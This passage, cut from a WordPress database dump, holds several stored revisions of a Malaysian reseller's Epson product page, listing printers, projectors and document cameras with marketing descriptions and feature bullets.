]<p><strong>Epson L850 PrinterÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L850-Printer.png\" alt=\"\" width=\"261\" height=\"147\" /></p><p>Imaging enthusiasts and professionals can look forward to the 6-colour ink tank system, presenting vibrant borderless prints and unrivalled performance at a remarkably low cost through this 3-in-1 photo printer.</p><ul><li>High-yield ink bottles</li><li>2.7 colour LCD screen</li><li>Direct printing via memory card slot, USB port and PictBridge</li><li>CD/DVD printing</li><li>Warranty of 1 year or 3,000 photo prints, whichever comes first</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson L805 PrinterÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L805-Printer-.png\" alt=\"\" width=\"240\" height=\"135\" /></p><p>The L805s integrated Wi-Fi support and expanded colour gamut of 6 inks brings you ease of printing from your mobile devices over a wireless network so you can print low-cost, lab-quality photos at your convenience.</p><ul><li>Yield of Up to 1,800 4R photos</li><li>Lowest Printing Costs</li><li>Wi-Fi &amp; Epson iPrint</li><li>CD/DVD Printing Capability</li><li>1 year or 3,000 prints warranty</li></ul>[maxbutton id=\"12\" ]		\n			<h3>Projectors for Work</h3>		\n			<h3>CORPORATE AND EDUCATIONÂ </h3>		\n		<p><strong>Epson EB-2055</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-2055.png\" alt=\"\" width=\"245\" height=\"163\" /></p><p>Leave the lights on and take control whether in the meeting room or classroom. Epsonâ€™s EB-2055 projector is engineered to shine outstandingly even in well-lit environments to enrich your presentation experience. Your brilliant presentations are made even better and more convenient with the new gesture-control function that allows you to navigate between your slides without the use of a peripheral device.</p><ul><li>XGA Resolution</li><li>White and Colour Light Output at 5,000 lumens</li><li>Gesture Presenter</li><li>Multi-PC Projection</li><li>2 x HDMI</li><li>Split Screen</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson EB-2142W</strong>Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-2142W.jpg\" alt=\"\" width=\"245\" height=\"138\" /></p><p>Enjoy success and unparalleled performance with Epson business projectors. Fully maximise your office space and experience a variety of connectivity options for your ultimate convenience. Along with long lamp-life and maintenance cycles, potential for saving costs and improving energy efficiency is now made possible for you. Every component is skillfully innovated with attention to detail in mind, including the integrated 3LCD technology that will provide you with stunning colour brightness for quality images.</p><ul><li>White and Colour Brightness at 4,200lm</li><li>WXGA Resolution</li><li>12000 hours lamp life in eco-mode</li><li>MHL-enabled</li><li>Multi-PC Projection</li><li>Horizontal Keystone Slider</li><li>Miracast<sup>Â®</sup></li></ul>[maxbutton id=\"12\" ]<br /><p><strong>Epson EB-L500WÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-L500W.jpg\" alt=\"\" width=\"251\" height=\"142\" /></p><p>The compact, affordable EB-L500W laser projector delivers powerful performance for education and business applications. Get bright, vivid images with 5,000 lumens colour/white brightness. This wireless projector also offers WXGA resolution and Full HD support. Featuring breakthrough laser technology, it delivers a laser light source of up to 20,000 hours. And, it offers virtually maintenance-free operation for the life of the optical engine. Plus, it features a Dynamic contrast ratio of up to 2,500,000:1. It also includes wireless networking with enterprise-level security, and advanced installation features.</p><ul><li>5,000 lumens colour/white brightness<sup>Â </sup></li><li>Colourful WXGA; up to 2,500,000:1 Dynamic contrast ratio</li><li>Laser light source of up to 20,000 hours</li><li>Virtually maintenance-free for optical engine life</li></ul>[maxbutton id=\"12\" ]		\n			<h3>ACCENT LIGHTING LASER PROJECTORS</h3>		\n		<p><strong>Epson LightScene EV-105</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-LightScene-EV-105.jpg\" alt=\"\" width=\"263\" height=\"176\" /></p><p>Create stunning visual displays and immersive environments with the LightScene EV-105, the cutting-edge digital signage solution from Epson. A convergence of lighting and display technology, LightScene laser projectors captivate audiences by simultaneously illuminating and projecting on virtually any surface or material, unleashing dynamic, experiential content for digital art, commercial signage and dÃ©cor applications. Designed to blend in discreetly to any setting â€” from retail, hospitality and event spaces to showrooms and museums â€” LightScene EV-105 offers a sleek, black spotlight design, with an array of configuration, mounting and programming options.</p><ul><li>Laser projector for digital art and signage</li><li>Seamlessly blends into virtually any environment</li><li>Up to 20,000 hours of virtually maintenance-free operation</li><li>360-degree mounting: floors, walls or ceilings</li><li>Remote management and control tools</li><li>Best New Award Overall</li></ul>[maxbutton id=\"12\" ]<h3>ULTRA PORTABLE</h3><p><strong>Epson EB-1785WÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-1785W.png\" alt=\"\" width=\"236\" height=\"133\" /></p><p>The Epson EB-1785W packs superior imaging quality along with a suite of connectivity and usability features into a body weighing only 1.83kg and 44mm slim. Wirelessly connect your smart devices to the projector via Wi-Fi, Miracast, iProjection application or NFC technology. The EB-1785W comes with Gesture Presenter technology, which allows you to transit between slides without a clicker. Lastly, with Epson\'s 3LCD technology that delivers up to 3 times wider colour gamut and brightness, you can astound audiences anywhere you go.</p><ul><li>White Light Output 3,200 lumens, Colour Light Output 3,200 lumens</li><li>WXGA Resolution</li><li>Real-Time Auto Keystone Correction</li><li>Split Screen Projection</li><li>Hassle-Free Presentation with USB 3-in-1 Display Feature and Epson iProjection</li></ul>[maxbutton id=\"12\" ]		\n			<h3>INTERACTIVE</h3>		\n		<p><strong>Epson EB-536WiÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-536Wi.png\" alt=\"\" width=\"242\" height=\"136\" /></p><p>Project large screen sizes even at close range and make your presentations larger-than-life with Epson EB-536Wi projector.</p><ul><li>White and Colour Brightness at 3,400lm</li><li>WXGA Resolution</li><li>Multi-PC projection</li><li>HDMI Connectivity</li><li>Pen Interactivity</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson 595Wi/585Wi/575Wi</strong>Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-595Wi.png\" alt=\"\" width=\"276\" height=\"155\" /></p><p>With the finger-touch interactive function and PC-free annotation, you can easily transform any surface into an interactive environment so everyone can throw their ideas on the table.</p><ul><li>WXGA Resolution</li><li>White and Colour Brightness at 3,300lm</li><li>Multi-PC projection</li><li>HDMI Connectivity x2</li></ul>[maxbutton id=\"12\" ]		\n			<h3>HIGH BRIGHTNESS</h3>		\n		<p><strong>Epson EB-L1405UNLÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/EB-L1405UNL.png\" alt=\"\" width=\"207\" height=\"117\" /></p><p>The Epson EB-L1405U projector is designed to deliver unyielding laser performance, from any position to most surfaces, up to 20,000Â long lasting hours maintenance-free.</p><ul><li>White and Colour Brightness at 8,000lm</li><li>WUXGA (1920 x 1200)</li><li>Edge-blending to create large panoramic images</li><li>Curve and corner wall projection</li><li>HDBaseT</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson EB-G7400UNLÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-G7400UNL.png\" alt=\"\" width=\"205\" height=\"116\" /></p><p>Epson high brightness EB-G7400U projector presents a new perspective on clarity, durability, and versatility. With the advanced C2Fineâ„¢ and 4K Enhancement Technology, projections are brought to life with vibrant colours in extreme resolution and vividness. Overcome the limitations of space constraints and project large and uncompromised images through the projectorâ€™s astoundingly short throw ratio of 0.35*.</p><p><em>* With optional ELPLX01 zero offset ultra-short throw lens.</em></p><ul><li>High Brightness</li><li>Beyond Full HD Resolution</li><li>Powered Lens</li><li>Portrait Projection</li><li>Flexible Installation</li><li>Edge Blending</li><li>Point Correction</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson EB-Z10000UÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-Z10000U.png\" alt=\"\" width=\"208\" height=\"117\" /></p><p>Discover a powerful way to impress your audience the EB-Z10000U high brightness business projector gives you stunning, high-definition images with its 3LCD technology.</p><ul><li>White and Colour Brightness at 10,000Â lm</li><li>WUXGA resolution</li><li>High Reliability and Durability</li><li>Suitable for 24/7 usage</li><li>Flexible projection angles and installations</li></ul>[maxbutton id=\"12\" ]<h3>DOCUMENT CAMERAS</h3><p><strong>Document Camera ELPDC21Â </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Document-Camera-ELPDC21.jpg\" alt=\"\" width=\"206\" height=\"137\" /></p><p>Cut through the hassle, and get straight to your presentation. Epsons series of document cameras not only captures details with Full HD resolution, its versatile connectivity also gives you great functionality.</p><ul><li>Pixels: 2MP (1920 x 1080 pixels)</li><li>Camera Sensor: 1/2.7 inch CMOS Sensor</li><li>Resolution: Up to Full HD (1080p)</li><li>Zoom: 10x Digital Zoom, 12x Optical Zoom</li><li>Weight: Approx 3.0kg</li></ul><p>[maxbutton id=\"12\" ]</p>','Epson','','inherit','closed','closed','','1486-revision-v1','','','2019-09-25 16:47:55','2019-09-25 08:47:55','',1486,'https://bintara.com.my/blog/2019/09/25/1486-revision-v1/',0,'revision','',0),(3450,1,'2019-09-25 16:48:48','2019-09-25 08:48:48','<p>As a global technology leader, Epson creates and delivers technology solutions for businesses and consumers, from inkjet printers and digital printing systems to 3LCD projectors, smart glasses, sensing systems and industrial robots. The company is focused on driving innovations and exceeding customer expectations in inkjet, visual communications, wearables and robotics.</p><h2>Printers for Work</h2><p>Epson has the best printers for your business requirements regardless documents, photos, receipts, large-formats, labels, or even apparels.</p>		\n			<h2>BUSINESS INKJET PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson WorkForce Enterprise WF-C17590Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-Enterprise-WF-C17590.jpg\" alt=\"\" width=\"366\" height=\"207\" /></p><p>Our massive investment in revolutionary technologies enables us to pay attention to every minute detail. PrecisionCoreâ„¢, our next generation, high-density printhead, takes a great leap forward in enterprise printing. Epson WorkForce Enterprise WF-C17590 has arrived, giving you exactly what you need: superior quality, excellent connectivity and prints at lightning fast speed.</p><ul><li>4-in-1 Network MFP: Print | Copy | Scan | Fax</li><li>Ink: DURABrite<sup>TM</sup>Â Pro pigment ink cartridges</li><li>ISO Print Speed: 75 ISO ppm (black/colour) simplex/duplex</li></ul>		\n		<h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce Pro WF-C5290Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-Pro-WF-C5290.png\" alt=\"\" width=\"378\" height=\"213\" /></p><p>Enjoy low-cost, reliable printing with Epson WorkForce Pro WF-C5290 business printer. Delivering fast print speeds of up to 24ipm with a first page-out time of just 4.8 seconds, it is built to handle the most demanding print jobs. With a range of printing and connectivity features, this printer is the ideal solution for small workgroups that require hassle-free, low-maintenance and productive-boosting printing.</p><ul><li>High yield ink packs</li><li>High-speed auto-duplex printing</li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC</li><li>Epson Connect</li><li>EnergyÂ saving</li></ul><h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce WF-100Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-WF-100.png\" alt=\"\" width=\"378\" height=\"213\" /></p><p>Introducing the Epson WorkForce WF-100, a lightweight portable inkjet printer designed for professionals on the go. Battery-operated with integrated wireless capabilities such as Wi-Fi Direct and Epson Connect, you can have quality colour printouts anytime, anywhere.</p><ul><li>Print speed up to 14 ppm</li><li>Epson Connect</li><li>1.44 Colour LCD Panel</li><li>Wi-Fi and Wi-Fi Direct connectivity</li><li>Built-in battery</li></ul>		\n		<h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce WF-7711</strong></h4>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-WF-7711.png\" alt=\"\" width=\"304\" height=\"172\" />\nChange the way you print A3+ business documents with the Epson WorkForce WF-7711 printer. Designed for convenience, this smart printer is equipped with a suite of connectivity features, from USB and Ethernet to Wi-Fi Direct and NFC. With PrecisionCore<sup>TM</sup>Â technology, fast printing speed consistently delivers success in every detail.\n<ul>\n 	<li>Print speeds up to 18ipm for black and 10ipm for colour</li>\n 	<li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC</li>\n 	<li>Duplex printing up to A3 size</li>\n 	<li>Epson DURABrite<sup>TM</sup>Â Ultra ink</li>\n 	<li>4.3â€ Colour LCD Touch Panel</li>\n 	<li>Print, Scan, Copy Fax with ADF</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center>		\n			<h3>INK TANK SYSTEM</h3>		\n		<p><strong>Epson EcoTank L3150</strong>Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EcoTank-L3150-.jpg\" alt=\"\" width=\"311\" height=\"175\" /></p><p>Save more with Epsonâ€™s economical and multifunctional printing solutions for businessâ€”the EcoTank L3150â€”built to bring down costs, and bring up productivity. The integrated ink tank enables spill-free, error-free refilling with individual bottles that have designated nozzles. Other features include borderless 4R printing and an ultra-high yield of 7,500 coloured and 4,500 black-and-white pages. The EcoTank L3150 also delivers the convenience of wireless connectivity, allowing direct printing from smart devices.</p><ul><li>Compact integrated tank design</li><li>High yield ink bottles</li><li>Spill-free, error-free refilling</li><li>Wi-Fi, Wi-Fi Direct</li><li>Epson Connect (Epson iPrint, Epson Email Print and Remote Print Driver)</li><li>Borderless printing up to 4R</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson L120 PrinterÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L120-Printer.png\" alt=\"\" width=\"301\" height=\"170\" /></p><p>The Epson L120 ink tank system printer brings speedy performance with low running costs to all your personal and work projects.</p><ul><li>High-yield ink bottles</li><li>Print speed up to 8.5ipm for black-and-white and 4.5ipm for color</li><li>Compact Size</li><li>Warranty of 2 Years or 20,000 Pages, whichever comes first</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson M1100 Printer</strong>Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-M1100-Printer-.png\" alt=\"\" width=\"315\" height=\"178\" /></p><p>EfficiencyÂ meets economy with the EcoTank monochrome M1100 printer. Look forward to lower business costs with bottles that provide an ultra-high page yield of up to 6,000 pagesÂ each. Simplify processes with the integrated ink tank that enables spill - and error-free ink refilling, and enjoy laser-quality text that is smudge-proof and water-resistant with the pigment ink.</p><ul><li>Compact integrated tank design</li><li>High-yield pigment ink bottle</li><li>Spill-free, error-free refilling</li><li>Print speed up to 32ppm (15ipm)</li><li>4 years warranty</li></ul>[maxbutton id=\"12\" ]		\n			<h3>LASER PRINTER</h3>		\n		<p><strong>Epson AcuLaser C9300N</strong>Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-AcuLaser-C9300N.png\" alt=\"\" width=\"313\" height=\"177\" /></p><p>The Epson AcuLaserâ„¢ C9300N breaks new ground with its class-leading 1200dpi standard resolution for A3 colour laser printing. Together with its fast speed and high reliability, it packs superior performance in a cost efficient design that perfectly complements the needs of demanding workgroups.</p><ul><li>1200 x 1200 dpi</li><li>Speed: Up to 30ppm</li><li>First page out in 8.3 sec or less (mono A4), 9.9 sec (colour A4)</li><li>Quality prints with new Epson Technologies</li><li>New print job management features</li></ul>[maxbutton id=\"12\" ]<p>Â <strong>Epson WorkForce AL-M320DNÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-AL-M320DN-.jpg\" alt=\"\" width=\"254\" height=\"296\" /></p><p>The Workforce AL-M320DN delivers absolute performance and reliability despite their compact size. Equipped with network printing capabilities and blazing fast performance to support ultra-high volume printing, these printers are built for the most demanding office environments. Further boost productivity with the free fleet management software, Epson Device Admin, to organise and monitor printers remotely.</p><ul><li>1200 x 1200 dpi</li><li>Print speed up to 35ppm</li><li>Auto-Duplex</li><li>Ethernet &amp; Epson iPrint</li><li>2 optional paper cassette tray</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson WorkForce AL-M8100DNÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-AL-M8100DN-.png\" alt=\"\" width=\"256\" height=\"144\" /></p><p>Unleash remarkable efficiency to your workflow. Powered by a 600Mhz dual core processor, the WorkForce AL-8100DN delivers quality A3 and A4 prints with swift speeds of up to 40ppm and is packed with 1GB RAM for faster processing of multiple print jobs.</p><ul><li>1200 x 1200 dpi</li><li>Print speed up to 40 ppm</li><li>Epson iPrint</li><li>Ethernet</li><li>4 optional cassette trays</li></ul>[maxbutton id=\"12\" ]		\n			<h3>POS PRINTER</h3>		\n		<p><strong>Epson TM-H6000IVÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-H6000IV.png\" alt=\"\" width=\"224\" height=\"125\" /></p><p>The Epson multifunction POS printer TM-H6000IV, features everything retailers need from fast receipt printing and check processing to best-in-class reliability.</p><ul><li>Thermal &amp; Dot Output</li><li>Speed: Up to 300mm/sec</li><li>Check printing</li><li>Bi-directional printing</li><li>SupportsÂ slip printing, validation and endorsement print</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson TM-T88V-iÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-T88V-i.png\" alt=\"\" width=\"243\" height=\"137\" /></p><p>Create a world of possibilities with TM-T88V-i Intelligent Solution. Equipped with cloud and web-capabilities, you\'ll have access to a variety of intelligent functions delivered by a compact, space-saving printer that fits easily into your business.</p><ul><li>Printing speed of up to 300mm/second</li><li>20 million lines for printer mechanism</li><li>Up to 2 million for auto-cutter</li><li>LAN, Serial, USB 2.0 (Type A) x 4</li><li>Control peripherals easily</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson TM-T70IIÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-T70II.png\" alt=\"\" width=\"254\" height=\"143\" /></p><p>The Epson\'s TM-T70II is the smallest in class receipt printer with a full frontal operation.</p><ul><li>Print method: Thermal line printing</li><li>Width: 79Â Â±Â 0.5 mm</li><li>Print Speed: Up to 250 mm/ sec</li><li>Auto-cutter feature</li></ul>[maxbutton id=\"12\" ]		\n			<h3>PHOTO PRINTER</h3>		\n		<p><strong>Epson L1800 A3 Photo Ink Tank Printer</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L1800-Printer.png\" alt=\"\" width=\"550\" height=\"310\" /></p><p>In creating the next wave of printing innovation, Epson introduces the worlds first truly affordable 6-colour A3+ original ink tank system printer.</p><ul><li>Yield of up to 1,500 4R photos</li><li>Print speed up to 15ppm</li><li>High-yield ink bottles</li><li>1-year warranty or 9,000 prints</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson L850 PrinterÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L850-Printer.png\" alt=\"\" width=\"261\" height=\"147\" /></p><p>Imaging enthusiasts and professionals can look forward to the 6-colour ink tank system, presenting vibrant borderless prints and unrivalled performance at a remarkably low cost through this 3-in-1 photo printer.</p><ul><li>High-yield ink bottles</li><li>2.7 colour LCD screen</li><li>Direct printing via memory card slot, USB port and PictBridge</li><li>CD/DVD printing</li><li>Warranty of 1 year or 3,000 photo prints, whichever comes first</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson L805 PrinterÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L805-Printer-.png\" alt=\"\" width=\"240\" height=\"135\" /></p><p>The L805s integrated Wi-Fi support and expanded colour gamut of 6 inks brings you ease of printing from your mobile devices over a wireless network so you can print low-cost, lab-quality photos at your convenience.</p><ul><li>Yield of Up to 1,800 4R photos</li><li>Lowest Printing Costs</li><li>Wi-Fi &amp; Epson iPrint</li><li>CD/DVD Printing Capability</li><li>1 year or 3,000 prints warranty</li></ul>[maxbutton id=\"12\" ]		\n			<h3>Projectors for Work</h3>		\n			<h3>CORPORATE AND EDUCATIONÂ </h3>		\n		<p><strong>Epson EB-2055</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-2055.png\" alt=\"\" width=\"245\" height=\"163\" /></p><p>Leave the lights on and take control whether in the meeting room or classroom. Epsonâ€™s EB-2055 projector is engineered to shine outstandingly even in well-lit environments to enrich your presentation experience. Your brilliant presentations are made even better and more convenient with the new gesture-control function that allows you to navigate between your slides without the use of a peripheral device.</p><ul><li>XGA Resolution</li><li>White and Colour Light Output at 5,000 lumens</li><li>Gesture Presenter</li><li>Multi-PC Projection</li><li>2 x HDMI</li><li>Split Screen</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson EB-2142W</strong>Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-2142W.jpg\" alt=\"\" width=\"245\" height=\"138\" /></p><p>Enjoy success and unparalleled performance with Epson business projectors. Fully maximise your office space and experience a variety of connectivity options for your ultimate convenience. Along with long lamp-life and maintenance cycles, potential for saving costs and improving energy efficiency is now made possible for you. Every component is skillfully innovated with attention to detail in mind, including the integrated 3LCD technology that will provide you with stunning colour brightness for quality images.</p><ul><li>White and Colour Brightness at 4,200lm</li><li>WXGA Resolution</li><li>12000 hours lamp life in eco-mode</li><li>MHL-enabled</li><li>Multi-PC Projection</li><li>Horizontal Keystone Slider</li><li>Miracast<sup>Â®</sup></li></ul>[maxbutton id=\"12\" ]<br /><p><strong>Epson EB-L500WÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-L500W.jpg\" alt=\"\" width=\"251\" height=\"142\" /></p><p>The compact, affordable EB-L500W laser projector delivers powerful performance for education and business applications. Get bright, vivid images with 5,000 lumens colour/white brightness. This wireless projector also offers WXGA resolution and Full HD support. Featuring breakthrough laser technology, it delivers a laser light source of up to 20,000 hours. And, it offers virtually maintenance-free operation for the life of the optical engine. Plus, it features a Dynamic contrast ratio of up to 2,500,000:1. It also includes wireless networking with enterprise-level security, and advanced installation features.</p><ul><li>5,000 lumens colour/white brightness<sup>Â </sup></li><li>Colourful WXGA; up to 2,500,000:1 Dynamic contrast ratio</li><li>Laser light source of up to 20,000 hours</li><li>Virtually maintenance-free for optical engine life</li></ul>[maxbutton id=\"12\" ]		\n			<h3>ACCENT LIGHTING LASER PROJECTORS</h3>		\n		<p><strong>Epson LightScene EV-105</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-LightScene-EV-105.jpg\" alt=\"\" width=\"263\" height=\"176\" /></p><p>Create stunning visual displays and immersive environments with the LightScene EV-105, the cutting-edge digital signage solution from Epson. A convergence of lighting and display technology, LightScene laser projectors captivate audiences by simultaneously illuminating and projecting on virtually any surface or material, unleashing dynamic, experiential content for digital art, commercial signage and dÃ©cor applications. Designed to blend in discreetly to any setting â€” from retail, hospitality and event spaces to showrooms and museums â€” LightScene EV-105 offers a sleek, black spotlight design, with an array of configuration, mounting and programming options.</p><ul><li>Laser projector for digital art and signage</li><li>Seamlessly blends into virtually any environment</li><li>Up to 20,000 hours of virtually maintenance-free operation</li><li>360-degree mounting: floors, walls or ceilings</li><li>Remote management and control tools</li><li>Best New Award Overall</li></ul>[maxbutton id=\"12\" ]<h3>ULTRA PORTABLE</h3><p><strong>Epson EB-1785WÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-1785W.png\" alt=\"\" width=\"236\" height=\"133\" /></p><p>The Epson EB-1785W packs superior imaging quality along with a suite of connectivity and usability features into a body weighing only 1.83kg and 44mm slim. Wirelessly connect your smart devices to the projector via Wi-Fi, Miracast, iProjection application or NFC technology. The EB-1785W comes with Gesture Presenter technology, which allows you to transit between slides without a clicker. Lastly, with Epson\'s 3LCD technology that delivers up to 3 times wider colour gamut and brightness, you can astound audiences anywhere you go.</p><ul><li>White Light Output 3,200 lumens, Colour Light Output 3,200 lumens</li><li>WXGA Resolution</li><li>Real-Time Auto Keystone Correction</li><li>Split Screen Projection</li><li>Hassle-Free Presentation with USB 3-in-1 Display Feature and Epson iProjection</li></ul>[maxbutton id=\"12\" ]		\n			<h3>INTERACTIVE</h3>		\n		<p><strong>Epson EB-536WiÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-536Wi.png\" alt=\"\" width=\"242\" height=\"136\" /></p><p>Project large screen sizes even at close range and make your presentations larger-than-life with Epson EB-536Wi projector.</p><ul><li>White and Colour Brightness at 3,400lm</li><li>WXGA Resolution</li><li>Multi-PC projection</li><li>HDMI Connectivity</li><li>Pen Interactivity</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson 595Wi/585Wi/575Wi</strong>Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-595Wi.png\" alt=\"\" width=\"276\" height=\"155\" /></p><p>With the finger-touch interactive function and PC-free annotation, you can easily transform any surface into an interactive environment so everyone can throw their ideas on the table.</p><ul><li>WXGA Resolution</li><li>White and Colour Brightness at 3,300lm</li><li>Multi-PC projection</li><li>HDMI Connectivity x2</li></ul>[maxbutton id=\"12\" ]		\n			<h3>HIGH BRIGHTNESS</h3>		\n		<p><strong>Epson EB-L1405UNLÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/EB-L1405UNL.png\" alt=\"\" width=\"207\" height=\"117\" /></p><p>The Epson EB-L1405U projector is designed to deliver unyielding laser performance, from any position to most surfaces, up to 20,000Â long lasting hours maintenance-free.</p><ul><li>White and Colour Brightness at 8,000lm</li><li>WUXGA (1920 x 1200)</li><li>Edge-blending to create large panoramic images</li><li>Curve and corner wall projection</li><li>HDBaseT</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson EB-G7400UNLÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-G7400UNL.png\" alt=\"\" width=\"205\" height=\"116\" /></p><p>Epson high brightness EB-G7400U projector presents a new perspective on clarity, durability, and versatility. With the advanced C2Fineâ„¢ and 4K Enhancement Technology, projections are brought to life with vibrant colours in extreme resolution and vividness. Overcome the limitations of space constraints and project large and uncompromised images through the projectorâ€™s astoundingly short throw ratio of 0.35*.</p><p><em>* With optional ELPLX01 zero offset ultra-short throw lens.</em></p><ul><li>High Brightness</li><li>Beyond Full HD Resolution</li><li>Powered Lens</li><li>Portrait Projection</li><li>Flexible Installation</li><li>Edge Blending</li><li>Point Correction</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson EB-Z10000UÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-Z10000U.png\" alt=\"\" width=\"208\" height=\"117\" /></p><p>Discover a powerful way to impress your audience the EB-Z10000U high brightness business projector gives you stunning, high-definition images with its 3LCD technology.</p><ul><li>White and Colour Brightness at 10,000Â lm</li><li>WUXGA resolution</li><li>High Reliability and Durability</li><li>Suitable for 24/7 usage</li><li>Flexible projection angles and installations</li></ul>[maxbutton id=\"12\" ]<h3>DOCUMENT CAMERAS</h3><p><strong>Document Camera ELPDC21Â </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Document-Camera-ELPDC21.jpg\" alt=\"\" width=\"206\" height=\"137\" /></p><p>Cut through the hassle, and get straight to your presentation. Epsons series of document cameras not only captures details with Full HD resolution, its versatile connectivity also gives you great functionality.</p><ul><li>Pixels: 2MP (1920 x 1080 pixels)</li><li>Camera Sensor: 1/2.7 inch CMOS Sensor</li><li>Resolution: Up to Full HD (1080p)</li><li>Zoom: 10x Digital Zoom, 12x Optical Zoom</li><li>Weight: Approx 3.0kg</li></ul><p>[maxbutton id=\"12\" ]</p>','Epson','','inherit','closed','closed','','1486-revision-v1','','','2019-09-25 16:48:48','2019-09-25 08:48:48','',1486,'https://bintara.com.my/blog/2019/09/25/1486-revision-v1/',0,'revision','',0),(3452,1,'2019-09-25 16:57:31','2019-09-25 08:57:31','<p>As a global technology leader, Epson creates and delivers technology solutions for businesses and consumers, from inkjet printers and digital printing systems to 3LCD projectors, smart glasses, sensing systems and industrial robots. The company is focused on driving innovations and exceeding customer expectations in inkjet, visual communications, wearables and robotics.</p><h2>Printers for Work</h2><p>Epson has the best printers for your business requirements regardless documents, photos, receipts, large-formats, labels, or even apparels.</p>		\n			<h2>BUSINESS INKJET PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson WorkForce Enterprise WF-C17590Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-Enterprise-WF-C17590.jpg\" alt=\"\" width=\"366\" height=\"207\" /></p><p>Our massive investment in revolutionary technologies enables us to pay attention to every minute detail. PrecisionCoreâ„¢, our next generation, high-density printhead, takes a great leap forward in enterprise printing. Epson WorkForce Enterprise WF-C17590 has arrived, giving you exactly what you need: superior quality, excellent connectivity and prints at lightning fast speed.</p><ul><li>4-in-1 Network MFP: Print | Copy | Scan | Fax</li><li>Ink: DURABrite<sup>TM</sup>Â Pro pigment ink cartridges</li><li>ISO Print Speed: 75 ISO ppm (black/colour) simplex/duplex</li></ul>		\n		<h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce Pro WF-C5290Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-Pro-WF-C5290.png\" alt=\"\" width=\"378\" height=\"213\" /></p><p>Enjoy low-cost, reliable printing with Epson WorkForce Pro WF-C5290 business printer. Delivering fast print speeds of up to 24ipm with a first page-out time of just 4.8 seconds, it is built to handle the most demanding print jobs. With a range of printing and connectivity features, this printer is the ideal solution for small workgroups that require hassle-free, low-maintenance and 